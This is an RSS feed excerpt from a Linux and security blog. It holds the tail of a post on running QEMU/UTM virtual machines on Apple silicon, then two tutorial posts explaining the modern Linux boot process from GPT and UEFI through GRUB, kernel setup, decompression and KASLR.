<p>Fortunately, it&rsquo;s not much work. As I mentioned above, the QEMU <code>-s</code> setups a gdbstub to listen on <code>localhost:1234</code>. This is because it&rsquo;s an alias for the command <code>-gdb tcp:localhost:1234</code>. So all we need to do is change localhost to the bridge interface our host uses to communicate with the guests.</p>
<p><code>ipconfig -a</code> on your MacOS terminal will show you all your interfaces and you should see <code>bridge100</code> or similar with an IP address ending in <code>.1</code> that matches your guest LAN. For me this is <code>192.168.64.1</code>; my guests can reach my MacOS host via this IP. So this is where we&rsquo;ll set up our gdbstub to listen, like so:</p>
<p><img src="https://sam4k.com/content/images/2022/01/guestdbg.jpg" alt=""></p>
<p>Now from my dev VM I&rsquo;ll be able to access the listener, allowing me to debug any other guests on the shared network, neat! I can do this in gdb with the following command:</p>
<p><code>(gdb) target remote 192.168.64.1:1234</code></p>
<h4 id="also-no-gdb-on-hvf">Also, No GDB on HVF</h4>
<p>Remember I said something about the grass not being so green? Well, hvf (QEMU&rsquo;s accelerator that uses Apple&rsquo;s hypverisor framework) doesn&rsquo;t support breakpoints (hardware or otherwise) via the gdbstub as of the time of writing (version 6.2.0 is used by UTM currently).</p>
<p>This means that whenever you want to debug (with breakpoints) a guest, regardless of the architecture, you need to make sure you go into <code>&quot;VM settings -&gt; &quot;QEMU&quot;</code> and uncheck <code>&quot;Use Hypervisor&quot;</code>. Yep, it&rsquo;s going to be slower, but it won&rsquo;t be forever.</p>
<h3 id="resizing-disks">Resizing Disks</h3>
<p>Something that might come in handy for some is knowing how to resize your guests&rsquo; disks, without having to attach a new one and go through that whole rigamarole.</p>
<p>For this you&rsquo;ll need to use QEMU in the terminal and I couldn&rsquo;t immediately find any binaries UTM might be using in their package, so I installed it via Brew, using <code>brew install qemu</code> - fairly straightforward.</p>
<ol>
<li>The command <code>qemu-img resize ~/Library/Containers/com.utmapp.UTM/Data/Documents/&lt;YOUR VM&gt;.utm/Images/disk-0.qcow2 +10G</code> will allow you to extend your VMs disk by 10GB.
<ul>
<li>Make sure you choose the right VM folder and disk!</li>
</ul>
</li>
<li>Depending on your guest OS, you&rsquo;ll likely need to do some additional tinkering to get the system to use the additional space, typically by extending the partition or logical volume
<ul>
<li>E.g. for extending LVM, you can follow <a href="https://fabianlee.org/2016/07/26/ubuntu-extending-a-virtualized-disk-when-using-lvm/">this guide</a></li>
</ul>
</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s pretty much it! As you can see it&rsquo;s not a particularly hands-on process, it just takes a bit of research and knowing what to use and what workarounds to take. If there&rsquo;s any additional gotchas or tips I stumble upon, I&rsquo;ll add them to this post.</p>
<p>I&rsquo;ve no doubt the ecosystem and support for Apple silicon will only improve and honestly I&rsquo;ve been impressed by the speed the open-source community has adopted it.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The (Modern) Boot Process [0x02]</title><description>Welcome to the second part of my totally-wasn&amp;#39;t-meant-to-be-a-one-part Linux internals post on the modern boot process! Last time I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your stor</description><link>https://sam4k.com/linternals-the-modern-boot-process-part-2/</link><guid isPermaLink="false">615b0a0e484d4d42c8e4a1b1</guid><category>linux</category><category>kernel</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 10 Oct 2021 14:13:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2021/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Welcome to the second part of my totally-wasn&rsquo;t-meant-to-be-a-one-part Linux internals post on the modern boot process! <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">Last time</a> I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your storage device; briefly touched on what happens when you power on your computer and what happens when it hands over control to UEFI.</p>
<p>So without anymore rambling and rehashing, let&rsquo;s jump right back into the action. UEFI has just consulted the EFI variables in NVRAM to determine boot order, locate the first available bootloader on the list and will now transfer control over to it &hellip;</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x03-optional-bootloader">0x03 Optional Bootloader</a>
<ul>
<li><a href="#wait-this-is-optional">Wait This Is Optional?</a></li>
</ul>
</li>
<li><a href="#0x04-the-kernel-setup">0x04 The Kernel (Setup)</a>
<ul>
<li><a href="#getting-to-main">Getting to Main</a></li>
<li><a href="#the-first-c">The First C</a></li>
<li><a href="#and-back-to-assembly">And Back To Assembly</a></li>
<li><a href="#decompression-time">Decompression Time!</a>
<ul>
<li>First Some Background</li>
<li>Back To Decompression</li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x05-the-kernel-initialisation">Next Time</a></li>
</ul>
<h2 id="0x03-optional-bootloader">0x03 Optional Bootloader</h2>
<p><img src="https://sam4k.com/content/images/2021/10/obhwg.gif" alt=""></p>
<p>There&rsquo;s a number of different bootloaders out there that you can use with your Linux system, each with their own pros and cons, but at their core they&rsquo;ll all need to meet the requirements laid out by the Linux Boot Protocol[1].</p>
<p>For reference, any specifics in this section will be referring to the common GNU GRUB 2 bootloader. It&rsquo;s worth noting that while we&rsquo;re operating within a Linux context, GRUB 2 and other bootloaders are capable of booting a variety of systems, not just Linux.</p>
<p>In days gone this was a multi-stage process due to the size constraints of the old BIOS+MBR system, however nowadays the entire bootloader can be stored in the ESP and UEFI can hand control straight over. In the case of GRUB 2, this is <code>grub_main(void)</code> over in <a href="https://github.com/rhboot/grub2/blob/master/grub-core/kern/main.c">grub-core/kern/main.c</a>, so feel free to follow along.  </p>
<p>First things first there&rsquo;s going to be some architecture-specific machine initialisation, like setting up the console; some rudimentary memory management; locating and loading dependencies/addons (e.g. GRUB modules); loading any configs etc.</p>
<p>With initialisation handled, the bootloader is in a position to be able to do it&rsquo;s job. Typically modern bootloaders like GRUB will provide an interactive menu to the user, with varying degrees of features. Invariably, however, should be the option to boot one or more kernels/operating systems.</p>
<p>As a quick aside, in GRUB this post-initialisation mode is called &ldquo;normal mode&rdquo; and we can see this in a call to <code>grub_load_normal_mode()</code> at the end of <code>grub_main()</code>, and yes  keen-eyed and battle-scarred GRUB users might notice a call to <code>grub_rescue_run ()</code> just under that. So, if normal mode falls through, we end up at the dreaded <code>grub rescue &gt;</code>&hellip;</p>
<p><img src="https://sam4k.com/content/images/2021/10/whywhy.gif" alt=""></p>
<p>Anyway, back to generic bootloader things, when we select our kernel (or more likely let the timer tick down and select the default option) - which is of course a Linux one, right?! - we begin the &ldquo;Linux Boot Protocol&rdquo; as outlined above[1] to get our chosen kernel up and running.</p>
<p>The short and sweet of this is that the bootloader will bootstrap the kernel by loading into memory the &ldquo;kernel real-mode code&rdquo;, consisting of the kernel setup and kernel boot sector, creating a memory mapping similar to the one seen below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl">        <span class="o">~</span>                        <span class="o">~</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Protected</span><span class="o">-</span><span class="n">mode</span> <span class="n">kernel</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">100000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">I</span><span class="o">/</span><span class="n">O</span> <span class="n">memory</span> <span class="n">hole</span>       <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">0</span><span class="n">A0000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Reserved</span> <span class="k">for</span> <span class="n">BIOS</span>     <span class="o">|</span> <span class="n">Leave</span> <span class="n">as</span> <span class="n">much</span> <span class="n">as</span> <span class="n">possible</span> <span class="n">unused</span>
</span></span><span class="line"><span class="cl">        <span class="o">~</span>                        <span class="o">~</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Command</span> <span class="n">line</span>          <span class="o">|</span> <span class="p">(</span><span class="n">Can</span> <span class="n">also</span> <span class="n">be</span> <span class="n">below</span> <span class="n">the</span> <span class="n">X</span><span class="o">+</span><span class="mi">10000</span> <span class="n">mark</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span><span class="o">+</span><span class="mi">10000</span> <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Stack</span><span class="o">/</span><span class="n">heap</span>            <span class="o">|</span> <span class="n">For</span> <span class="n">use</span> <span class="n">by</span> <span class="n">the</span> <span class="n">kernel</span> <span class="n">real</span><span class="o">-</span><span class="n">mode</span> <span class="n">code</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span><span class="o">+</span><span class="mi">08000</span> <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Kernel</span> <span class="n">setup</span>          <span class="o">|</span> <span class="n">The</span> <span class="n">kernel</span> <span class="n">real</span><span class="o">-</span><span class="n">mode</span> <span class="n">code</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Kernel</span> <span class="n">boot</span> <span class="n">sector</span>    <span class="o">|</span> <span class="n">The</span> <span class="n">kernel</span> <span class="n">legacy</span> <span class="n">boot</span> <span class="n">sector</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span>       <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Boot</span> <span class="n">loader</span>           <span class="o">|</span> <span class="o">&lt;-</span> <span class="n">Boot</span> <span class="n">sector</span> <span class="n">entry</span> <span class="n">point</span> <span class="mi">0000</span><span class="p">:</span><span class="mi">7</span><span class="n">C00</span>
</span></span><span class="line"><span class="cl"><span class="mi">001000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Reserved</span> <span class="k">for</span> <span class="n">MBR</span><span class="o">/</span><span class="n">BIOS</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000800</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Typically</span> <span class="n">used</span> <span class="n">by</span> <span class="n">MBR</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000600</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">BIOS</span> <span class="n">use</span> <span class="n">only</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">...</span> <span class="n">where</span> <span class="n">the</span> <span class="n">address</span> <span class="n">X</span> <span class="n">is</span> <span class="n">as</span> <span class="n">low</span> <span class="n">as</span> <span class="n">the</span> <span class="n">design</span> <span class="n">of</span> <span class="n">the</span> <span class="n">boot</span> <span class="n">loader</span> <span class="n">permits</span><span class="o">.</span>
</span></span></code></pre></div><p>Without going down the rabbit hole, the tl;dr on &ldquo;real-mode&rdquo; is that modern processors have several &ldquo;processor modes&rdquo; (legacy modes, long mode). These control how the processor sees and manages the system memory and the tasks that use it. For legacy reasons, processors boot into real-mode and this is the mode we have been running in so far<a href="http://flint.cs.yale.edu/feng/cos/resources/BIOS/procModes.htm"></a><a href="https://en.wikipedia.org/wiki/X86-64#Operating_modes">[3]</a>.</p>
<p>One of the limits of the &ldquo;legacy&rdquo; real-mode is a limit of 1MB addressable RAM. Yep. Old school right? So that explains why the memory map above only goes to <code>100000</code> and why the area beyond it is labelled &ldquo;Protected-mode kernel&rdquo;, neat!</p>
<p>Back to the kernel real-mode code we&rsquo;ve loaded into memory for the kernel setup. Once loaded into memory, the bootloader will read and set fields from the kernel setup header, which can be found at a fixed offset from the start of the setup code[4].</p>
<p>This header helps define the information necessary for the bootloader to hand over control directly to the kernel setup code.</p>
<h3 id="wait-this-is-optional">Wait This Is Optional?</h3>
<p>The keen-eyed of you will be wondering why the section was titled &ldquo;Optional Bootloader&rdquo; - after all that all seemed kinda crucial right? Well, harnessing the flexibility and power of UEFI over Legacy BIOS, &ldquo;the Linux kernel supports EFISTUB booting which allows <a href="https://wiki.archlinux.org/title/EFI"><strong>EFI</strong></a> firmware to load the kernel as an EFI executable&rdquo;<a href="https://wiki.archlinux.org/title/EFISTUB">[5]</a>.</p>
<p>However, bear in mind that there are tradeoffs between using EFISTUB and the more feature-rich bootloaders-of-old like GRUB 2.</p>
<ol>
<li>For x86, we can find this in <code>[linux/documentation/ARCH/boot[ing].rst](https://github.com/torvalds/linux/blob/master/Documentation/x86/boot.rst)</code></li>
<li>See <code>grub_main(void)</code> over in <a href="https://github.com/rhboot/grub2/blob/master/grub-core/kern/main.c">grub-core/kern/main.c</a>, first thing we call is arch specific <code>grub_machine_init()</code>.</li>
<li><a href="https://en.wikipedia.org/wiki/X86-64#Operating_modes">https://en.wikipedia.org/wiki/X86-64#Operating_modes</a></li>
<li>For x86 we can see this action over in  <code>[/arch/x86/boot/header.S](https://github.com/torvalds/linux/blob/0adb32858b0bddf4ada5f364a84ed60b196dbcda/arch/x86/boot/header.S#L297)</code></li>
<li><a href="https://wiki.archlinux.org/title/EFISTUB">https://wiki.archlinux.org/title/EFISTUB</a></li>
</ol>
<h2 id="0x04-the-kernel-setup">0x04 The Kernel (Setup)</h2>
<p><img src="https://sam4k.com/content/images/2021/12/are_we_there_yet.gif" alt=""></p>
<p>Okay, so we&rsquo;re not QUITE in the kernel proper yet, we still need to run the kernel setup code (<code>/arch/x86/boot/header.S</code> for x86) in order to basically get a suitable environment up an running to be able to run <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> in real mode, the first bit of C code! And THEN we can start to look into loading the rest of the kernel into memory. Anyway:</p>
<h3 id="getting-to-main">Getting to Main</h3>
<p>In order to get to main, header.S does some housekeeping to make sure everything is how it should be. This includes making sure all the segment register values are aligned, setting up the stack, BSS area as well as some error handling in the form of a checking a setup signature to ensure everything&rsquo;s looking good before jumping to main.</p>
<h3 id="the-first-c">The First C</h3>
<p>It&rsquo;s all starting to kick off now! Except we&rsquo;re still not technically in the kernel yet, as that&rsquo;s still sat in a compressed image, waiting to be freed![1] For the sake of brevity, I&rsquo;m going to quickly cover some of the key steps we take after running <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> in order to ultimately decompress the kernel and run the actual kernel.</p>
<p>Initialisation, initialisation and then some more initialisation! During this stage the heap, console, keyboard, video mode and more are initialised. Furthermore CPU validation is carried out as well as memory detection in order to provide a map of available RAM to the CPU.</p>
<p>Another important part of the setup is the transition into protected mode and then 64-bit mode. Remember earlier we mentioned how we&rsquo;ve been running in real-mode, one of several processor modes, which comes with a limit of 1MB addressable RAM?</p>
<p>The last task of <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> is to shed those shackles and enable the transition into protected mode; the tl;dr is this is a more powerful mode with full access to the system&rsquo;s memory, multitasking and support for virtual memory. After setting up the Interrupt &amp; Global Descriptor Tables (IGT, GDT) among other things, we jump to the 32-bit protected mode entry point.</p>
<h3 id="and-back-to-assembly">And Back To Assembly</h3>
<p>Yep, that&rsquo;s right, the 32-bit entry point is defined in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">arch/x86/boot/compressed/head_64.S</a> and will cover some more setup, similar to what we saw for real-mode, as well as enabling the transition into long mode AKA 64-bit mode. So many modes, right?</p>
<p>Well, technically 64-bit mode is an enhancement of protected mode and is the native mode for <a href="https://en.wikipedia.org/wiki/X86-64">x86_64</a> processors. It provides additional features and capabilities; allowing the CPU to take advantage of 64-bit processing.</p>
<p>During this stage some more setup occurs, the GDT is updated, page tables are initialised and after entering 64-bit mode, we jump to the 64-bit entry point in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">head_64.S</a>.</p>
<h3 id="decompression-time">Decompression Time!</h3>
<p><img src="https://sam4k.com/content/images/2021/12/unpacking.gif" alt=""></p>
<h4 id="first-some-background">First Some Background</h4>
<p>Okay, there&rsquo;s a lot to unpack here (haha), so I&rsquo;ll try to keep things brief. At boot time, the kernel is typically sat on disk as a compressed image. You can check this out for yourself:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[sam4k ~]$ ls /boot
</span></span><span class="line"><span class="cl">...  efi  grub  ...  vmlinuz-linux
</span></span><span class="line"><span class="cl">[sam4k ~]$ file /boot/vmlinuz-linux 
</span></span><span class="line"><span class="cl">/boot/vmlinuz-linux: Linux kernel x86 boot executable bzImage ...
</span></span></code></pre></div><p>With a little peek, we can see our kernel as it&rsquo;s stored on disk! You&rsquo;ll notice a couple of things here, one being that the kernel is compressed as a <code>bzImage</code> and that it&rsquo;s an executable?!</p>
<p>The <code>bzImage</code>, big zImage, format was developed (unsurprisingly) to tackle size limitations for a growing Linux kernel. Although original compressed with gzip, newer kernels have wider support, including LZMA &amp; bzip2<a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">[2]</a>.</p>
<p><code>bzImage</code> files also follows a specific format, containing concatenated <code>bootsect.o</code> + <code>setup.o</code> + <code>misc.o</code> + <code>piggy.o</code>. Where <code>piggy.o</code> contains a gzipped <code>vmlinux</code> file in its data section<a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">[2]</a>. Still following?</p>
<p>Now, the <code>vmlinux</code> file (notice we dropped the z) is a statically linked executable file that contains the Linux kernel in one of the object file formats supported by Linux, typically (and in thise case) the Executable and Linkable Format AKA ELF<a href="https://en.wikipedia.org/wiki/Vmlinux">[3]</a>.</p>
<p>Out-of-scope for now, but the vmlinux is really neat, being an ELF means you can load it up into a debugger just like any other ELF, and make use of any symbols.</p>
<h4 id="back-to-decompression">Back To Decompression</h4>
<p>Okay, we&rsquo;d just jumped to the 64-bit entry point in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">arch/x86/boot/compressed/head_64.S</a> after transitioning to 64-bit mode. Now, like the last mode transition, there&rsquo;s some more low level house keeping done and</p>
<p>After the transition to 64-bit mode there&rsquo;s some more low level house keeping done, including figuring out where the decompressed kernels going to go, copying the compressed kernel their and then preparing the params for the <code>extract_kernel</code> function<a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/misc.c">[4]</a>!</p>
<p>As a security nerd, one of these parameters, the output of the decompressed kernel involves a call to <code>choose_random_location</code><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/kaslr.c">[5]</a> - this is integral to providing kernel address space layout randomization by randomizing where the kernel code is placed at boot time<a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization">[6]</a>.</p>
<p>Some checks and a <code>__decompress</code> call later, the kernel is decompressed. The decompression is done in place (remember we made a copy of the compressed kernel earlier). However, we still need to move the now decompressed kernel to the right place, and that&rsquo;s where <code>parse_elf</code> (remember the kernel image is an ELF executable!) and <code>handle_relocations</code> come in[7].</p>
<p>The tl;dr on these functions is to check the ELF header, load the various segments into memory (bearing in mind our KASLR), adjusting kernel addresses as necessary and finally moving everything to the right place in memory.</p>
<p>Next? After extract is complete, we jump to the kernel!</p>
<ol>
<li>You can check this out for yourself by exploring your <code>/boot/</code> folder</li>
<li><a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">https://en.wikipedia.org/wiki/Vmlinux#bzImage</a></li>
<li><a href="https://en.wikipedia.org/wiki/Vmlinux">https://en.wikipedia.org/wiki/Vmlinux</a></li>
<li><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/misc.c">arch/x86/boot/compressed/misc.c</a></li>
<li><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/kaslr.c">arch/x86/boot/compressed/kaslr.c</a></li>
<li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization</a></li>
<li>You can find the src for these functions over in <a href="https://github.com/torvalds/linux/blob/master/arch/x86/boot/compressed/misc.c">/arch/x86/boot/compressed/misc.c</a></li>
</ol>
<h2 id="0x05-the-kernel-initialisation">0x05 The Kernel (Initialisation)</h2>
<p><img src="https://sam4k.com/content/images/2021/12/jklol.gif" alt=""></p>
<p>Yep, this fella is turning into a 3-part epic. Apologies! Tune in next time where we&rsquo;ll cover the last two phases of the boot process I want to cover (hopefully in one post&hellip;):</p>
<ul>
<li>0x05 The Kernel (Initialisation)</li>
<li>0x06 Systemd (Yikes)</li>
</ul>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The (Modern) Boot Process [0x01]</title><description>What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a po</description><link>https://sam4k.com/linternals-the-modern-boot-process-part-1/</link><guid isPermaLink="false">612609ada6be9c0727d014a7</guid><category>linux</category><category>kernel</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 26 Sep 2021 14:12:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2021/08/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a power button, to a fully usable Linux operating system.  </p>
<p>As I mentioned in the introduction post for this series, I&rsquo;m going to focus primarily on modern technologies and implementations where possible. So for this post I&rsquo;ll be covering how UEFI reads our hard drive&rsquo;s GPT to figure out how to find our Linux kernel. Once the kernels loaded in memory and ready to go, we look at how it uses systemd to get the operating system up and running in a usable state for us.</p>
<p><img src="https://sam4k.com/content/images/2021/08/confused2.gif" alt=""></p>
<p>Confused? Don&rsquo;t worry, hopefully by the end of the post you&rsquo;ll be able to understand that last part, otherwise I need to rethink this whole series thing. Anyway, without further ado let&rsquo;s jump over to where the magic begins.</p>
<p><strong>Disclaimer</strong>: as I mentioned in my Linternals introduction, this series aims to strike a middle ground between curious Linux users and system programmers; so as a result of not diving super low, I may miss some nuances of particular hardware/implementations or otherwise generalise more complex topics.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x00-gpt">0x00 GPT</a>
<ul>
<li><a href="#lba">LBA?</a></li>
<li><a href="#a-whistle-stop-tour">A Whistle-stop Tour</a>
<ul>
<li>Protective MBR</li>
<li>Primary GPT Header</li>
<li>Partition Entries</li>
<li>Partitions</li>
<li>Secondary GPT</li>
<li>More GPT Resources</li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x01-push-the-button">0x01 Push The Button!</a></li>
<li><a href="#0x02-uefi">0x02 UEFI</a>
<ul>
<li><a href="#the-esp">The ESP</a></li>
<li><a href="#csm">CSM</a></li>
</ul>
</li>
<li><a href="#0x03-optional-bootloader">Next Time</a></li>
</ul>
<h2 id="0x00-gpt">0x00 GPT</h2>
<p>Okay, before we actually turn our computer on lets have a look at how all our data, like the operating system we want to run, is stored on a storage device (e.g. an SSD or HDD).</p>
<p>The GUID Partition Table (GPT) scheme is a standard for formatting storage devices using, who&rsquo;d have thought it, globally unique identifiers (GUIDs). It was designed to improve upon its more limited predecessor, the Master Boot Record (MBR).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> LBA +----------------------+ &lt;- Disk Sart
</span></span><span class="line"><span class="cl"> 000 | Protective MBR       |             
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> 001 | Primary GPT Header   |  |          
</span></span><span class="line"><span class="cl">     +----------------------+  | Primary  
</span></span><span class="line"><span class="cl"> 002 | Entry 1 | 2 | 3 | 4  |  | GPT      
</span></span><span class="line"><span class="cl">     +----------------------+  |          
</span></span><span class="line"><span class="cl"> 003 | Entries 5 |...| 128  |  |          
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> 034 | Partition 1          |             
</span></span><span class="line"><span class="cl">     +----------------------+             
</span></span><span class="line"><span class="cl">  X  | Partition ...        |             
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> X+1 | Entry 1 | 2 | 3 | 4  |  |          
</span></span><span class="line"><span class="cl">     +----------------------+  |          
</span></span><span class="line"><span class="cl"> X+2 | Entries 5 | ... |128 |  | Secondary
</span></span><span class="line"><span class="cl">     +----------------------+  | GPT      
</span></span><span class="line"><span class="cl">X+34 | Secondary GPT Header |  |          
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;- Disk End 
</span></span></code></pre></div><h3 id="lba">LBA?</h3>
<p>Before we have a brief look at what this diagram actually means, let me quickly explain what LBA actually means. In days of old physical blocks memory on hard disks were addressed using the cylinder-head-sector (CHS) scheme, nowadays the newer Logical Block Addressing (LBA) is more commonly used.</p>
<p>The tl;dr is that LBA is a simple linear addressing scheme which abstracts away from the physical details of the storage device; like the whole cylinder, head, sector stuff. This means the operating system (and our diagram above) simply needs to know that blocks of memory in our storage are located by an index; such that the logical block address of the first block is 0, the second is 1 and so on.</p>
<p>On the topic of &ldquo;blocks of memory&rdquo; and layout schemes, Linux uses 512 bytes for its logical block size. So <code>LBA0</code> is a 512-byte block and the &ldquo;Primary GPT&rdquo; (we&rsquo;ll worry about that means in a second) above spans 33 blocks so is <code>33*512=16896</code> bytes large.</p>
<h3 id="a-whistle-stop-tour">A Whistle-stop Tour</h3>
<p>Now that we know that LBA is just indexing blocks of memory in our disk, we can begin to briefly go over what the rest of that gibberish means. MBR? Entries?? Paritions?!</p>
<h4 id="protective-mbr">Protective MBR</h4>
<p>&ldquo;What&rsquo;s the deal with this &ldquo;Protective MBR&rdquo;, I thought GPT replaced that?&rdquo; I hear you ask, and that&rsquo;s an astute observation! Well, as part of the GPT scheme the first LBA of the disk - <code>LBA0</code> - is reserved for backwards compatibility with programs that are expecting an MBR.</p>
<p>However, this is not backwards compatibility in the traditional sense, and mainly a protection mechanism in order to prevent programs that don&rsquo;t know about GPT from thinking the disk is unformatted and corrupt and potentially overwriting parts of our disk. As a result, the protective MBR basically defines the entire disk as one partition and sets the &ldquo;System ID&rdquo; of the partition as <code>0xEE</code> which denotes a GPT disk.</p>
<p>As a result, older programs at the very least will see a single partition of an unknown type, without free space and generally shouldn&rsquo;t touch it. And yes, that means the old MBR scheme fit into a single 512 byte logical block!</p>
<p><img src="https://sam4k.com/content/images/2021/09/small.gif" alt=""></p>
<h4 id="primary-gpt-header">Primary GPT Header</h4>
<p>Now that we&rsquo;ve mitigated against any accidental formatting at the hands of MBR zealots, we have the &ldquo;Primary GPT&rdquo; and first up is <code>LBA1</code>, the Primary GPT Header. The header block contains various metadata about the disk and GPT scheme, including the range of usable logical blocks as well as number and size of partition entries.</p>
<h4 id="partition-entries">Partition Entries</h4>
<p>The partition entries span <code>LBA2-LBA33</code> which each block containing 4 entries, making it <code>512/4=128</code> bytes per partition entry. Unsurprisingly, each entry represents a possible partition and if present contains the metadata necessary to define it: type GUID, unique GUID, start LBA, end LBA, name, attribute flags etc.</p>
<h4 id="partitions">Partitions</h4>
<p>These are the areas of storage defined by our partition entries previously and where our actual operating system and user data is going to be found. Not much else to say!</p>
<h4 id="secondary-gpt">Secondary GPT</h4>
<p>The Secondary GPT can be found out the end of the disk and is essentially just a duplicate of the Primary GPT for added redundancy in case the Primary gets corrupted.  </p>
<h4 id="more-gpt-resources">More GPT Resources</h4>
<ol>
<li><a href="http://ntfs.com/guid-part-table.htm">http://ntfs.com/guid-part-table.htm</a></li>
</ol>
<h2 id="0x01-push-the-button">0x01 Push The Button!</h2>
<p><img src="https://sam4k.com/content/images/2021/09/POWERON.gif" alt=""></p>
<p>So now we know <em>how</em> stuff is stored on our disk, let&rsquo;s figure our what to do with the stuff on it and how that let&rsquo;s me play Crusader Kings III. The first step? Pushing that power button of course!</p>
<p>I know I said I was going to avoid digging too deep into the nitty-gritty with this series, but I think it&rsquo;s worth briefly touching on what&rsquo;s going on under-the-hood here rather than <em>thematic cut to UEFI</em>; that said feel free to skip this section for the theatrical cut.</p>
<p>Okay let&rsquo;s do this. So, we&rsquo;ve just hit the power button, what now? Well I&rsquo;m no engineer but as far as I understand, pressing that button causes a momentary short circuit in the motherboard which is enough for it send a signal over to the Power Supply Unit (PSU).</p>
<p>Upon receiving the signal, the PSU provides electricity to the computer. The motherboard should then receive the power good signal and starts the CPU. The CPU then does some initialisation and the important part is that it loads up a pre-configured start address, <code>0xfffffff0</code>, which is where it expects to find the first instruction. This typically contains a <code>jmp</code> instruction (called the reset vector) which takes you to the BIOS/UEFI entry point.</p>
<h3 id="fancy-a-deeper-dive">Fancy a deeper dive?</h3>
<ol>
<li><a href="https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html">https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html</a></li>
</ol>
<h2 id="0x02-uefi">0x02 UEFI</h2>
<p><img src="https://sam4k.com/content/images/2021/10/thebeginning.gif" alt=""></p>
<p>Before we dive into the technicals, let&rsquo;s clear up a couple of naming ambiguities:</p>
<blockquote>
<p>Unified Extensible Firmware Interface (UEFI) is a specification for a software program that connects a computer&rsquo;s firmware to its operating system (OS).<a href="https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI#:~:text=Unified%20Extensible%20Firmware%20Interface%20(UEFI)%20is%20a%20specification%20for%20a,its%20operating%20system%20(OS).&amp;text=Like%20BIOS%2C%20UEFI%20is%20installed,runs%20when%20booting%20a%20computer.">[1]</a></p>
</blockquote>
